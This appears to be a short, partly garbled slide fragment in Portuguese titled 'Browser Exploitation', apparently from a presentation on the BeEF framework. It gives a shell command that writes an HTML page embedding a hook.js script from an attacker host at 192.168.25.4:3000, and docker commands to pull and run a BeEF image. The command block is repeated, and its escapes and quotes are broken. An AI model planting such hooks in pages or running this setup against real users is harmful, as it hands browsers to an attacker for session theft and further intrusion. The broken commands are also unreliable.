BROWSER EXPLOITATION
echo -e "<html> n <head>n <script type="text/
javascript" src="http://192.168.25.4:3000/hook.js
">n </script>n </head>n <body>n teste 1 n </
body>n </html>" >index3.html
docker pull janes/beef
docker run --rm -p 3000:3000 janes/beef

Beefataque

  • 1.
  • 3.
    echo -e "<html>n <head>n <script type="text/ javascript" src="http://192.168.25.4:3000/hook.js ">n </script>n </head>n <body>n teste 1 n </ body>n </html>" >index3.html docker pull janes/beef docker run --rm -p 3000:3000 janes/beef